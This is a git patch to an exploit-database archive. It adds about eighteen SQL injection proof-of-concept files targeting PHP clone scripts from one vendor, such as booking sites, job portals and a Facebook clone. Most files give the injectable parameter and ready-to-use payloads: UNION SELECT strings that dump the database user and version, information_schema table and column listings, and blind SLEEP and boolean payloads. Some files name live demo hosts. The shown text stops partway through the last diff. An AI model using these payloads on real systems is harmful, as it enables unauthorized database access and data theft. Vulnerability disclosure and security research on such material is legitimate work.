From e37fd2bae34347008ae6550e7969a30749236a21 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 11 Dec 2017 05:02:14 +0000 Subject: [PATCH] DB: 2017-12-11 18 changes to exploits/shellcodes Nearbuy Clone Script 3.2 - 'search' SQL Injection Cab Booking Script 1.0 - 'city' SQL Injection Chartered Accountant Booking Script 1.0 - 'city' SQL Injection Child Care Script 1.0 - 'city' SQL Injection CMS Auditor Website 1.0 - SQL Injection Co-work Space Search Script 1.0 - 'city' SQL Injection Yoga Class Script 1.0 - 'list?city' SQL Injection Consumer Complaints Clone Script 1.0 - 'id' SQL Injection Entrepreneur Job Portal Script 2.0.6 - 'jobsearch_all.php?rid1' SQL Injection Doctor Search Script 1.0 - 'city' SQL Injection Food Order Script 1.0 - 'list?city' SQL Injection E-commerce MLM Software 1.0 - SQL Injection Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection Event Calendar Category Script 1.0 - 'city' SQL Injection Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection Kickstarter Clone Acript 2.0 - 'projid' SQL Injection --- exploits/php/webapps/43268.txt | 34 +++++++++++++++++++++ exploits/php/webapps/43269.txt | 28 +++++++++++++++++ exploits/php/webapps/43270.txt | 27 +++++++++++++++++ exploits/php/webapps/43271.txt | 27 +++++++++++++++++ exploits/php/webapps/43272.txt | 26 ++++++++++++++++ exploits/php/webapps/43273.txt | 26 ++++++++++++++++ exploits/php/webapps/43274.txt | 28 +++++++++++++++++ exploits/php/webapps/43275.txt | 28 +++++++++++++++++ exploits/php/webapps/43276.txt | 28 +++++++++++++++++ exploits/php/webapps/43277.txt | 40 +++++++++++++++++++++++++ exploits/php/webapps/43279.txt | 28 +++++++++++++++++ exploits/php/webapps/43280.txt | 32 ++++++++++++++++++++ exploits/php/webapps/43281.txt | 29 ++++++++++++++++++ exploits/php/webapps/43282.txt | 28 +++++++++++++++++ exploits/php/webapps/43283.txt | 55 ++++++++++++++++++++++++++++++++++ exploits/php/webapps/43284.txt | 35 ++++++++++++++++++++++ exploits/php/webapps/43285.txt | 43 ++++++++++++++++++++++++++ exploits/php/webapps/43286.txt | 25 ++++++++++++++++ files_exploits.csv | 18 +++++++++++ 19 files changed, 585 insertions(+) create mode 100644 exploits/php/webapps/43268.txt create mode 100644 exploits/php/webapps/43269.txt create mode 100644 exploits/php/webapps/43270.txt create mode 100644 exploits/php/webapps/43271.txt create mode 100644 exploits/php/webapps/43272.txt create mode 100644 exploits/php/webapps/43273.txt create mode 100644 exploits/php/webapps/43274.txt create mode 100644 exploits/php/webapps/43275.txt create mode 100644 exploits/php/webapps/43276.txt create mode 100644 exploits/php/webapps/43277.txt create mode 100644 exploits/php/webapps/43279.txt create mode 100644 exploits/php/webapps/43280.txt create mode 100644 exploits/php/webapps/43281.txt create mode 100644 exploits/php/webapps/43282.txt create mode 100644 exploits/php/webapps/43283.txt create mode 100644 exploits/php/webapps/43284.txt create mode 100644 exploits/php/webapps/43285.txt create mode 100644 exploits/php/webapps/43286.txt diff --git a/exploits/php/webapps/43268.txt b/exploits/php/webapps/43268.txt new file mode 100644 index 000000000..b601263aa --- /dev/null +++ b/exploits/php/webapps/43268.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Nearbuy Clone Script 3.2 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/nearbuy-clone/ +# Demo: http://www.fxwebsolution.com/demo/arthi/nearby/ +# Version: 3.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/category_list.php?search=[SQL] +# +# Parameter: search (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: search=s%' AND 2775=2775 AND '%'=' +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: search=s%' AND SLEEP(5) AND '%'=' +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43269.txt b/exploits/php/webapps/43269.txt new file mode 100644 index 000000000..1fea555f6 --- /dev/null +++ b/exploits/php/webapps/43269.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Cab Booking Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/cab-booking-script-2/ +# Demo: http://fxwebsolution.com/demo/cab_booking/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/service-list?city=[SQL]&main_search= +# +# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43270.txt b/exploits/php/webapps/43270.txt new file mode 100644 index 000000000..68b39cf8e --- /dev/null +++ b/exploits/php/webapps/43270.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Chartered Accountant Booking Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/chartered-accountant-booking-script/ +# Demo: http://fxwebsolution.com/demo/chartered-accountant/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/service-list?city=[SQL]&main_search= +# +# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43271.txt b/exploits/php/webapps/43271.txt new file mode 100644 index 000000000..e08e87307 --- /dev/null +++ b/exploits/php/webapps/43271.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Child Care Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/child-care-script/ +# Demo: http://ordermanagementscript.com/demo/childcare/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43272.txt b/exploits/php/webapps/43272.txt new file mode 100644 index 000000000..e2bd96e07 --- /dev/null +++ b/exploits/php/webapps/43272.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: CMS Auditor Website 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/cms-auditor-website/ +# Demo: http://74.124.215.220/~projclient/client/auditor/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/news-detail/47[SQL] +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43273.txt b/exploits/php/webapps/43273.txt new file mode 100644 index 000000000..f2c446840 --- /dev/null +++ b/exploits/php/webapps/43273.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Co-work Space Search Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/co-work-space-search-script/ +# Demo: http://ordermanagementscript.com/demo/co-work-space/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43274.txt b/exploits/php/webapps/43274.txt new file mode 100644 index 000000000..faa58b468 --- /dev/null +++ b/exploits/php/webapps/43274.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Consumer Complaints Clone Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/consumer-complaints-clone-script/ +# Demo: http://fxwebsolution.com/demo/consumer-complaints/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/other-user-profile.php?id=[SQL] +# +# -1'++/*!50000UNION*/(SELECT(1),/*!11111CONCAT_WS*/(0x203a20,USER(),VERSION()),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43275.txt b/exploits/php/webapps/43275.txt new file mode 100644 index 000000000..fdac6507f --- /dev/null +++ b/exploits/php/webapps/43275.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Entrepreneur Job Portal Script 2.0.6 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-job-portal-script/ +# Demo: http://freelancewebdesignerchennai.com/demo/job-portal/ +# Version: 2.0.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/jobsearch_all.php?rid1=[SQL] +# +# -1'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43276.txt b/exploits/php/webapps/43276.txt new file mode 100644 index 000000000..e1742c8be --- /dev/null +++ b/exploits/php/webapps/43276.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Doctor Search Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/ +# Demo: http://fxwebsolution.com/demo/doctorsearch/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43277.txt b/exploits/php/webapps/43277.txt new file mode 100644 index 000000000..ce4a58cf4 --- /dev/null +++ b/exploits/php/webapps/43277.txt @@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: E-commerce MLM Software 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/e-commerce-mlm/ +# Demo: http://74.124.215.220/~advaemlm/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/service_detail.php?pid=[SQL] +# +# -6'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--+- +# +# +# 2) +# http://localhost/[PATH]/event_detail.php?eventid=[SQL] +# +# -18'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7--+- +# +# +# 3) +# http://localhost/[PATH]/news_detail.php?newid=[SQL] +# +# -27'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),3,4,5,6--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43279.txt b/exploits/php/webapps/43279.txt new file mode 100644 index 000000000..ff6718c6f --- /dev/null +++ b/exploits/php/webapps/43279.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Event Search Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/event-search-script/ +# Demo: http://ordermanagementscript.com/demo/eventsearch/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/event-list?city=[SQL]&main_search= +# +# -176'+UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43280.txt b/exploits/php/webapps/43280.txt new file mode 100644 index 000000000..6dda2d1e5 --- /dev/null +++ b/exploits/php/webapps/43280.txt @@ -0,0 +1,32 @@ +# # # # # +# Exploit Title: Facebook Clone Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/facebook-clone/ +# Demo: http://smsemailmarketing.in/demo/fbclone/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/friend-profile.php?id=[SQL +# +# -1'++/*!22222UNION*/(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))--+- +# +# http://server/friend-profile.php?id=-1'++/*!22222UNION*/(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))--+- +# +# 2) +# http://localhost/[PATH]/process.php?send=[SQL +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43281.txt b/exploits/php/webapps/43281.txt new file mode 100644 index 000000000..c5806519a --- /dev/null +++ b/exploits/php/webapps/43281.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Food Order Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/food-order-script-2/ +# Demo: http://ordermanagementscript.com/demo/food-order/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# '++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+- +# +# http://server/list?city='++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43282.txt b/exploits/php/webapps/43282.txt new file mode 100644 index 000000000..1d39515e2 --- /dev/null +++ b/exploits/php/webapps/43282.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Yoga Class Script 1.0 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/yoga-class-script/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# -'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# http://server/list?city=-'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43283.txt b/exploits/php/webapps/43283.txt new file mode 100644 index 000000000..d8d73ab29 --- /dev/null +++ b/exploits/php/webapps/43283.txt @@ -0,0 +1,55 @@ +# # # # # +# Exploit Title: Freelance Website Script 2.0.6 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/freelance-website-script/ +# Version: 2.0.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/jobdetails.php?pr_id=[SQL] +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93),(94),(95),(96),(97),(98),(99),(100))--+- +# +# http://server/jobdetails.php?pr_id=-1'++UNION(SELECT(1),(2),(3),(4),(5),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93),(94),(95),(96),(97),(98),(99),(100))--+- +# +# +# Parameter: pr_id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: pr_id=51' AND 7083=7083 AND 'cZLs'='cZLs +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: pr_id=51' AND SLEEP(5) AND 'UHvA'='UHvA +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 83 columns +# Payload: pr_id=51' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707671,0x7755764a6b7a5561565652766766574a78435a486b457569645768756b456950765a706e4a6d7445,0x7162766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GImX +# +# +# 2) +# http://localhost/[PATH]/searchbycat_list.php?catid=[SQL] +# +# -15++UNION(SELECT(1),(2),(3),(4),(5),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88))--+- +# +# http://server/searchbycat_list.php?catid=-15++UNION(SELECT(1),(2),(3),(4),(5),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88))--+- +# +# Parameter: catid (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: catid=15 AND SLEEP(5)-- nGws +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43284.txt b/exploits/php/webapps/43284.txt new file mode 100644 index 000000000..3df296eb5 --- /dev/null +++ b/exploits/php/webapps/43284.txt @@ -0,0 +1,35 @@ +# # # # # +# Exploit Title: Hot Scripts Clone 3.1 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/ +# Version: 3.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/categories?subctid=[SQL] +# +# -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- +# +# http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- +# +# 2) +# http://localhost/[PATH]/categories?&mctid=[SQL] +# +# -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43285.txt b/exploits/php/webapps/43285.txt new file mode 100644 index 000000000..81ce471f4 --- /dev/null +++ 